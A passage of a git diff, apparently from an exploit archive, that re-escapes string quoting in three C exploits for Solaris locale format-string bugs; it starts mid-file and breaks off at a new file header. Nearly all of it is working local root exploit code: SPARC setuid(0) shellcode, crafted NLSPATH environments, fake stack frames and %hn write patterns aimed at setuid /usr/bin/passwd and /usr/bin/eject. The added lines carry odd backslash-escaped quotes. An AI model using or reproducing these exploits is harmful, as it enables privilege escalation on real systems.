- else if(!strncmp(argv[1], "shell", 5)) { shell = 1; } - else if(!strncmp(argv[1], "exploit", 7)) { exploit = 1; } + if (!strncmp(argv[1], \"dump\", 4)) { dump = 1; } + else if(!strncmp(argv[1], \"shell\", 5)) { shell = 1; } + else if(!strncmp(argv[1], \"exploit\", 7)) { exploit = 1; } else { usage(argv[0]); } for (i = 2; i < argc; i++) { - if ( (sscanf(argv[i], "--align=%d", &align) || - sscanf(argv[i], "--num=%d", &num) || - sscanf(argv[i], "--shellofs=%d", &shellofs) || - sscanf(argv[i], "--retlocofs=%d", &retlocofs) || - sscanf(argv[i], "--retloc=%x", &retloc))== 0) { - printf("Unrecognized option %s\n\n", argv[i]); + if ( (sscanf(argv[i], \"--align=%d\", &align) || + sscanf(argv[i], \"--num=%d\", &num) || + sscanf(argv[i], \"--shellofs=%d\", &shellofs) || + sscanf(argv[i], \"--retlocofs=%d\", &retlocofs) || + sscanf(argv[i], \"--retloc=%x\", &retloc))== 0) { + printf(\"Unrecognized option %s\\n\\n\", argv[i]); usage(argv[0]); } } @@ -243,54 +243,54 @@ main(int argc, char **argv) /* sh_add now points to the beginning of the shell buffer */ - printf("Calculated shell buffer address: 0x%x\n", sh_addr); + printf(\"Calculated shell buffer address: 0x%x\\n\", sh_addr); if (shell == 1) { put_long(&shellbuf[align], sh_addr); /* put sh_addr on the stack */ } if ( ((sh_addr + align) & 0xfffffffc) != (sh_addr + align) ) { - printf("Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\n"); + printf(\"Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\\n\"); } if (retloc == RETLOC) { /* if retloc was not specified on the command line, calculate it */ retloc = sh_addr + align - num*4 + retlocofs; - printf("Calculated retloc: 0x%x\n", retloc); + printf(\"Calculated retloc: 0x%x\\n\", retloc); put_long(&shellbuf[align+4], retloc); put_long(&shellbuf[align+12], retloc+2); } jmp_addr = (sh_addr + align) + 64; /* Calculate the shell jump location */ - printf("Calculated shell code jump location: 0x%x\n\n", jmp_addr); + printf(\"Calculated shell code jump location: 0x%x\\n\\n\", jmp_addr); /* create the format string */ ptr = pattern; for (i = 0; i < num; i++) { - memcpy(ptr, "%.8x", 4); + memcpy(ptr, \"%.8x\", 4); ptr = ptr + 4; } if (dump == 1) { *ptr = 0; /* null-terminate */ - printf("Stack dump mode, dumping %d words\n", num); + printf(\"Stack dump mode, dumping %d words\\n\", num); } else if (shell == 1) { - sprintf(ptr, " Shell buffer: %%s"); + sprintf(ptr, \" Shell buffer: %%s\"); - printf("shellbuf (length = %d): %s\n\n", strlen(shellbuf)+1, shellbuf); - printf("Shell buffer dump mode, shell buffer address is 0x%x\n", sh_addr); + printf(\"shellbuf (length = %d): %s\\n\\n\", strlen(shellbuf)+1, shellbuf); + printf(\"Shell buffer dump mode, shell buffer address is 0x%x\\n\", sh_addr); } else { reth = (jmp_addr >> 16) & 0xffff; retl = (jmp_addr >> 0) & 0xffff; - sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (reth - num * 8), (retl - reth)); - printf("Exploit mode, jumping to 0x%x\n", jmp_addr); + sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\", (reth - num * 8), (retl - reth)); + printf(\"Exploit mode, jumping to 0x%x\\n\", jmp_addr); } - printf("num: %d\t\talign: %d\tshellofs: %d\tretlocofs: %d\tretloc: 0x%x\n\n", + printf(\"num: %d\\t\\talign: %d\\tshellofs: %d\\tretlocofs: %d\\tretloc: 0x%x\\n\\n\", num, align, shellofs, retlocofs, retloc); /* execute the vulnerable program using our custom environment */ diff --git a/platforms/solaris/local/20186.c b/platforms/solaris/local/20186.c index ec9323f83..51fefe4b9 100755 --- a/platforms/solaris/local/20186.c +++ b/platforms/solaris/local/20186.c @@ -23,11 +23,11 @@ It should be noted under Linux this problem must be exploited in conjunction wit * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. * ./ex -o -4 ) * - * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'` + * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'` * usages: ./ex -h * * Thanks for Ivan Arce who found this bug. - * Thanks for horizon's great article about defeating noexec stack for Solaris. + * Thanks for horizon\'s great article about defeating noexec stack for Solaris. * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. @@ -44,20 +44,20 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define BUFSIZE 2048 /* the size of format string buffer*/ #define BUFF 128 /* the progname buffer size */ -#define SHELL "/bin/ksh" /* shell name */ +#define SHELL \"/bin/ksh\" /* shell name */ #define DEFAULT_NUM 68 /* format strings number */ #define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */ -#define VULPROG "/usr/bin/passwd" /* vulnerable program name */ +#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */ void usages(char *progname) { int i; - printf("Usage: %s \n", progname); - printf(" [-h] Help menu\n"); - printf(" [-n number] format string's number\n"); - printf(" [-a align] retloc buffer alignment\n"); - printf(" [-o offset] retloc offset\n\n"); + printf(\"Usage: %s \\n\", progname); + printf(\" [-h] Help menu\\n\"); + printf(\" [-n number] format string\'s number\\n\"); + printf(\" [-a align] retloc buffer alignment\\n\"); + printf(\" [-o offset] retloc offset\\n\\n\"); } @@ -65,7 +65,7 @@ void usages(char *progname) long get_sp(void) { - __asm__("mov %sp,%i0"); + __asm__(\"mov %sp,%i0\"); } @@ -97,22 +97,22 @@ main( int argc, char **argv ) strncpy(progname, argv[0], BUFF-1); - while ((opt = getopt(argc, argv, "n:a:o:h")) != -1) + while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1) switch((char)opt) { - case 'n': + case \'n\': num = atoi(optarg); break; - case 'a': + case \'a\': align = atoi(optarg); break; - case 'o': + case \'o\': offset = atoi(optarg); break; - case '?': - case 'h': + case \'?\': + case \'h\': default: usages(progname); exit(0); @@ -125,8 +125,8 @@ main( int argc, char **argv ) /* Construct fake frame in environ */ - env[0] = "NLSPATH=:."; - env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */ + env[0] = \"NLSPATH=:.\"; + env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */ /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */ env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */ env[3]=&(fakeframe[40]);/* |0x00 */ @@ -136,17 +136,17 @@ main( int argc, char **argv ) env[7]=SHELL; /* shell strings */ env[8]=NULL; - /* calculate the length of "VULPROG" + argv[1] */ - arg_len = strlen(VULPROG) + strlen("-z") + 2; + /* calculate the length of \"VULPROG\" + argv[1] */ + arg_len = strlen(VULPROG) + strlen(\"-z\") + 2; /* calculate the pad nummber . - * We manage to let the length of padding + arg_len + "NLSPATH=." can + * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can * be divided by 4. So fakeframe address is aligned with 4, otherwise - * the exploit won't work. + * the exploit won\'t work. */ pad = 3 - (arg_len + strlen(env[0]) +1)%4; - memset(padding, 'A', pad); - padding[pad] = '\0'; + memset(padding, \'A\', pad); + padding[pad] = \'\\0\'; /* get environ length */ env_len = 0; @@ -162,21 +162,21 @@ main( int argc, char **argv ) * ^ ^ * |__startaddr |__sp_addr * - * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) + * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) * - * I find "startaddr" always can be divided by 4. - * So we can adjust the padding's size to let the fakeframe address + * I find \"startaddr\" always can be divided by 4. + * So we can adjust the padding\'s size to let the fakeframe address * can be aligned with 4. * - * len = length of "argv" + "env" + "platform" + "program name" + * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" * if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4 * if (len%4)==0, sp_addr - startaddr = len - * So we can get every entry's address precisely based on startaddr or sp_addr. - * Now we won't be bored with guessing the alignment and offset.:) + * So we can get every entry\'s address precisely based on startaddr or sp_addr. + * Now we won\'t be bored with guessing the alignment and offset.:) */ len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1; - printf("len = %#x\n", len); + printf(\"len = %#x\\n\", len); /* get stack bottom address */ @@ -189,7 +189,7 @@ main( int argc, char **argv ) sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */ - strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ; - printf("SHELL address = %#x\n", sh_addr); + printf(\"SHELL address = %#x\\n\", sh_addr); /* get our fake frame address */ fp_addr = sh_addr - 8*8 - 1; @@ -197,27 +197,27 @@ main( int argc, char **argv ) /* get execl() address */ if (!(handle=dlopen(NULL,RTLD_LAZY))) { - fprintf(stderr,"Can't dlopen myself.\n"); + fprintf(stderr,\"Can\'t dlopen myself.\\n\"); exit(1); } - if ((execl_addr=(long)dlsym(handle,"execl"))==NULL) + if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL) { - fprintf(stderr,"Can't find execl().\n"); + fprintf(stderr,\"Can\'t find execl().\\n\"); exit(1); } - /* dec 4 to skip the 'save' instructure */ + /* dec 4 to skip the \'save\' instructure */ execl_addr -= 4; /* check if the exec addr includes zero */ if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) || !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000)) { - fprintf(stderr,"the address of execl() contains a '0'. sorry.\n"); + fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\"); exit(1); } - printf("Using execl() address : %#x\n",execl_addr); + printf(\"Using execl() address : %#x\\n\",execl_addr); /* now we set up our fake stack frame */ @@ -239,15 +239,15 @@ main( int argc, char **argv ) *addrptr++=fp1_addr; *addrptr++=fp1_addr; *addrptr++=fp1_addr; /* we need this address to work */ - *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */ + *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */ *addrptr++=0x0; /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */ retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align ); + printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align ); - /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ + /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ addrptr = (long *)retlocbuf; for( i = 0 ; i < 8 ; i ++ ) @@ -258,19 +258,19 @@ main( int argc, char **argv ) *(addrptr + 7) = retloc + 2; if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf("Can't get enough memory!\n"); + printf(\"Can\'t get enough memory!\\n\"); exit(-1); } - /* Let's make formats string buffer: + /* Let\'s make formats string buffer: * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn| */ ptr = pattern; - memset(ptr, 'A', 32); + memset(ptr, \'A\', 32); ptr += 32; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, "%.8x", 4); + memcpy(ptr, \"%.8x\", 4); ptr += 4; } @@ -281,30 +281,30 @@ main( int argc, char **argv ) /* Big endian arch */ - sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn", + sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\", (reth - num*8 -4*8 + align ), (0x10000 + retl - reth), (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1)); - if( !(fp = fopen("messages.po", "w+"))) + if( !(fp = fopen(\"messages.po\", \"w+\"))) { - perror("fopen"); + perror(\"fopen\"); exit(1); } - fprintf(fp,"domain \"messages\"\n"); - fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n"); - fprintf(fp,"msgstr \"%s\\n\"", pattern + align); + fprintf(fp,\"domain \\\"messages\\\"\\n\"); + fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\"); + fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align); fclose(fp); - system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po"); + system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\"); - /* thanks for z33d's idea. + /* thanks for z33d\'s idea. * It seems we have to do like this in Solaris 8. */ - i=open("./SUNW_OST_OSLIB",O_RDWR); + i=open(\"./SUNW_OST_OSLIB\",O_RDWR); /* locate the start position of formats strings in binary file*/ lseek(i, 62, SEEK_SET); /* replace the start bytes with our retlocbuf */ write(i, retlocbuf + align, 32 - align); close(i); - execle(VULPROG, VULPROG, "-z", NULL, env); + execle(VULPROG, VULPROG, \"-z\", NULL, env); } /* end of main */ \ No newline at end of file diff --git a/platforms/solaris/local/20188.c b/platforms/solaris/local/20188.c index 3858c4088..b57fd50ca 100755 --- a/platforms/solaris/local/20188.c +++ b/platforms/solaris/local/20188.c @@ -19,7 +19,7 @@ It should be noted under Linux this problem must be exploited in conjunction wit */ -/* "eject" exploit for locale subsystem format strings bug In Solaris +/* \"eject\" exploit for locale subsystem format strings bug In Solaris * Tested in Solaris 2.6/7.0 * Script kiddies: you should modify this code * slightly by yourself. :) @@ -37,30 +37,30 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define RETLOC 0xffbefa2c /* default retloc */ #define NUM 95 /* maybe should adjust this number */ -#define ALIGN 0 /* If don't work ,try adjust align to 0,1,2,3 */ +#define ALIGN 0 /* If don\'t work ,try adjust align to 0,1,2,3 */ #define BUFSIZE 2048 /* the size of format string buffer*/ #define EGGSIZE 1024 /* the egg buffer size */ -#define NOP 0xfa1d4015 /* "xor %l5, %l5, %l5" */ +#define NOP 0xfa1d4015 /* \"xor %l5, %l5, %l5\" */ #define ALIGN1 2 -#define VULPROG "/usr/bin/eject" +#define VULPROG \"/usr/bin/eject\" -char shellcode[] = /* from scz's funny shellcode for SPARC */ -"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */ -"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */ -"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08" -"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" -"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e" -"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07" -"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" -"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff"; +char shellcode[] = /* from scz\'s funny shellcode for SPARC */ +\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */ +\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */ +\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\" +\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\" +\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\" +\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\" +\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\" +\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"; /* get current stack point address to guess Return address */ long get_sp(void) { - __asm__("mov %sp,%i0"); + __asm__(\"mov %sp,%i0\"); } @@ -76,14 +76,14 @@ main( int argc, char **argv ) long reth, retl; FILE *fp; - if( argc > 1 ) sscanf(argv[1],"%x",&retloc); + if( argc > 1 ) sscanf(argv[1],\"%x\",&retloc); if( argc > 2 ) align = atoi(argv[2]); if( argc > 3 ) num = atoi(argv[3]); addrptr = (long *) retlocbuf; retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - /* Let's make reloc buffer */ + /* Let\'s make reloc buffer */ for( i = 0 ; i < 2 ; i ++ ){ *addrptr++ = 0x41414141; @@ -94,7 +94,7 @@ main( int argc, char **argv ) /* construct shellcode buffer */ - memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */ + memset(eggbuf,\'A\',EGGSIZE); /* fill the eggbuf with garbage */ for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */ { eggbuf[i+3]=NOP & 0xff; @@ -106,8 +106,8 @@ main( int argc, char **argv ) If not, exploit will fail. Anyway, our shellcode is. ;-) */ memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode, strlen(shellcode)); - //memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */ - env[0] = "NLSPATH=:."; + //memcpy(eggbuf,\"EGG=\",4);/* Now : EGG=NOP...NOPSHELLCODE */ + env[0] = \"NLSPATH=:.\"; env[1] = eggbuf; /* put eggbuf in env */ env[2] = NULL; /* end of env */ @@ -117,43 +117,43 @@ main( int argc, char **argv ) /* get stack bottom address */ sp_addr = (get_sp() | 0xffff) & 0xfffffffc; /* get shellcode address . many thanks to Olaf Kirch. :) - * the trailing '8' make sure our sh_addr into "NOP"s area. + * the trailing \'8\' make sure our sh_addr into \"NOP\"s area. */ sh_addr = sp_addr - strlen(VULPROG) - strlen(plat) - strlen(eggbuf) - 3 + 8 ; - printf("Usages: %s \n\n", argv[0] ); - printf("Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\n", retloc, sh_addr, align ); + printf(\"Usages: %s \\n\\n\", argv[0] ); + printf(\"Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\\n\", retloc, sh_addr, align ); if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf("Can't get enough memory!\n"); + printf(\"Can\'t get enough memory!\\n\"); exit(-1); } ptr = pattern; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, "%.8x", 4); + memcpy(ptr, \"%.8x\", 4); ptr += 4; } reth = (sh_addr >> 16) & 0xffff ; retl = (sh_addr >> 0) & 0xffff ; - sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(reth - num*8), + sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\",(reth - num*8), (0x10000 + retl - reth)); - printf("%s",pattern); + printf(\"%s\",pattern); - if( !(fp = fopen("messages.po", "w+"))) + if( !(fp = fopen(\"messages.po\", \"w+\"))) { - perror("fopen"); + perror(\"fopen\"); exit(1); } - fprintf(fp,"domain \"messages\"\n"); - fprintf(fp,"msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n"); - fprintf(fp,"msgstr \"%s\\n\"", pattern); + fprintf(fp,\"domain \\\"messages\\\"\\n\"); + fprintf(fp,\"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\"); + fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern); fclose(fp); - system("/usr/bin/msgfmt messages.po"); - system("cp messages.mo SUNW_OST_OSCMD"); - system("cp messages.mo SUNW_OST_OSLIB"); + system(\"/usr/bin/msgfmt messages.po\"); + system(\"cp messages.mo SUNW_OST_OSCMD\"); + system(\"cp messages.mo SUNW_OST_OSLIB\"); - execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env); + execle(VULPROG,VULPROG,\"-x\",retlocbuf + align1, NULL, env); } /* end of main */ diff --git a/platforms/solaris/local/210.c b/platforms/solaris/local/210.c index ba2f92d73..24de0470b 100755 --- a/platforms/solaris/local/210.c +++ b/platforms/solaris/local/210.c @@ -3,11 +3,11 @@ * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. * ./ex -o -4 ) * - * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'` + * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'` * usages: ./ex -h * * Thanks for Ivan Arce who found this bug. - * Thanks for horizon's great article about defeating noexec stack for Solaris. + * Thanks for horizon\'s great article about defeating noexec stack for Solaris. * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. @@ -24,26 +24,26 @@ #define BUFSIZE 2048 /* the size of format string buffer */ #define BUFF 128 /* the progname buffer size */ -#define SHELL "/bin/ksh" /* shell name */ +#define SHELL \"/bin/ksh\" /* shell name */ #define DEFAULT_NUM 68 /* format strings number */ #define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */ -#define VULPROG "/usr/bin/passwd" /* vulnerable program name */ +#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */ void usages(char *progname) { int i; - printf("Usage: %s \n", progname); - printf(" [-h] Help menu\n"); - printf(" [-n number] format string's number\n"); - printf(" [-a align] retloc buffer alignment\n"); - printf(" [-o offset] retloc offset\n\n"); + printf(\"Usage: %s \\n\", progname); + printf(\" [-h] Help menu\\n\"); + printf(\" [-n number] format string\'s number\\n\"); + printf(\" [-a align] retloc buffer alignment\\n\"); + printf(\" [-o offset] retloc offset\\n\\n\"); } /* get current stack point address to guess Return address */ long get_sp(void) { - __asm__("mov %sp,%i0"); + __asm__(\"mov %sp,%i0\"); } main( int argc, char **argv ) @@ -70,22 +70,22 @@ main( int argc, char **argv ) char progname[BUFF]; strncpy(progname, argv[0], BUFF-1); - while ((opt = getopt(argc, argv, "n:a:o:h")) != -1) + while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1) switch((char)opt) { - case 'n': + case \'n\': num = atoi(optarg); break; - case 'a': + case \'a\': align = atoi(optarg); break; - case 'o': + case \'o\': offset = atoi(optarg); break; - case '?': - case 'h': + case \'?\': + case \'h\': default: usages(progname); exit(0); @@ -98,8 +98,8 @@ main( int argc, char **argv ) /* Construct fake frame in environ */ - env[0] = "NLSPATH=:."; - env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */ + env[0] = \"NLSPATH=:.\"; + env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */ /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */ env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */ env[3]=&(fakeframe[40]);/* |0x00 */ @@ -109,17 +109,17 @@ main( int argc, char **argv ) env[7]=SHELL; /* shell strings */ env[8]=NULL; - /* calculate the length of "VULPROG" + argv[1] */ - arg_len = strlen(VULPROG) + strlen("-z") + 2; + /* calculate the length of \"VULPROG\" + argv[1] */ + arg_len = strlen(VULPROG) + strlen(\"-z\") + 2; /* calculate the pad nummber . - * We manage to let the length of padding + arg_len + "NLSPATH=." can + * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can * be divided by 4. So fakeframe address is aligned with 4, otherwise - * the exploit won't work. + * the exploit won\'t work. */ pad = 3 - (arg_len + strlen(env[0]) +1)%4; - memset(padding, 'A', pad); - padding[pad] = '\0'; + memset(padding, \'A\', pad); + padding[pad] = \'\\0\'; /* get environ length */ env_len = 0; @@ -134,21 +134,21 @@ main( int argc, char **argv ) * ^ ^ * |__startaddr |__sp_addr * - * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) + * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) * - * I find "startaddr" always can be divided by 4. - * So we can adjust the padding's size to let the fakeframe address + * I find \"startaddr\" always can be divided by 4. + * So we can adjust the padding\'s size to let the fakeframe address * can be aligned with 4. * - * len = length of "argv" + "env" + "platform" + "program name" + * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" * if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4 * if (len%4)==0, sp_addr - startaddr = len - * So we can get every entry's address precisely based on startaddr or sp_addr. - * Now we won't be bored with guessing the alignment and offset.:) + * So we can get every entry\'s address precisely based on startaddr or sp_addr. + * Now we won\'t be bored with guessing the alignment and offset.:) */ len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1; - printf("len = %#x\n", len); + printf(\"len = %#x\\n\", len); /* get stack bottom address */ @@ -161,7 +161,7 @@ main( int argc, char **argv ) sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */ - strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ; - printf("SHELL address = %#x\n", sh_addr); + printf(\"SHELL address = %#x\\n\", sh_addr); /* get our fake frame address */ fp_addr = sh_addr - 8*8 - 1; @@ -169,27 +169,27 @@ main( int argc, char **argv ) /* get execl() address */ if (!(handle=dlopen(NULL,RTLD_LAZY))) { - fprintf(stderr,"Can't dlopen myself.\n"); + fprintf(stderr,\"Can\'t dlopen myself.\\n\"); exit(1); } - if ((execl_addr=(long)dlsym(handle,"execl"))==NULL) + if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL) { - fprintf(stderr,"Can't find execl().\n"); + fprintf(stderr,\"Can\'t find execl().\\n\"); exit(1); } - /* dec 4 to skip the 'save' instructure */ + /* dec 4 to skip the \'save\' instructure */ execl_addr -= 4; /* check if the exec addr includes zero */ if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) || !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000)) { - fprintf(stderr,"the address of execl() contains a '0'. sorry.\n"); + fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\"); exit(1); } - printf("Using execl() address : %#x\n",execl_addr); + printf(\"Using execl() address : %#x\\n\",execl_addr); /* now we set up our fake stack frame */ @@ -211,15 +211,15 @@ main( int argc, char **argv ) *addrptr++=fp1_addr; *addrptr++=fp1_addr; *addrptr++=fp1_addr; /* we need this address to work */ - *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */ + *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */ *addrptr++=0x0; /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */ retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align ); + printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align ); - /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ + /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ addrptr = (long *)retlocbuf; @@ -231,19 +231,19 @@ main( int argc, char **argv ) *(addrptr + 7) = retloc + 2; if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf("Can't get enough memory!\n"); + printf(\"Can\'t get enough memory!\\n\"); exit(-1); } - /* Let's make formats string buffer: + /* Let\'s make formats string buffer: * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn| */ ptr = pattern; - memset(ptr, 'A', 32); + memset(ptr, \'A\', 32); ptr += 32; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, "%.8x", 4); + memcpy(ptr, \"%.8x\", 4); ptr += 4; } @@ -254,32 +254,32 @@ main( int argc, char **argv ) /* Big endian arch */ - sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn", + sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\", (reth - num*8 -4*8 + align ), (0x10000 + retl - reth), (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1)); - if( !(fp = fopen("messages.po", "w+"))) + if( !(fp = fopen(\"messages.po\", \"w+\"))) { - perror("fopen"); + perror(\"fopen\"); exit(1); } - fprintf(fp,"domain \"messages\"\n"); - fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n"); - fprintf(fp,"msgstr \"%s\\n\"", pattern + align); + fprintf(fp,\"domain \\\"messages\\\"\\n\"); + fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\"); + fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align); fclose(fp); - system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po"); + system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\"); - /* thanks for z33d's idea. + /* thanks for z33d\'s idea. * It seems we have to do like this in Solaris 8. */ - i=open("./SUNW_OST_OSLIB",O_RDWR); + i=open(\"./SUNW_OST_OSLIB\",O_RDWR); /* locate the start position of formats strings in binary file*/ lseek(i, 62, SEEK_SET); /* replace the start bytes with our retlocbuf */ write(i, retlocbuf + align, 32 - align); close(i); - execle(VULPROG, VULPROG, "-z", NULL, env); + execle(VULPROG, VULPROG, \"-z\", NULL, env); } diff --git a/platforms/win_x86-64/remote/34334.rb b/platforms/win_x86-64/remote/34334.rb index 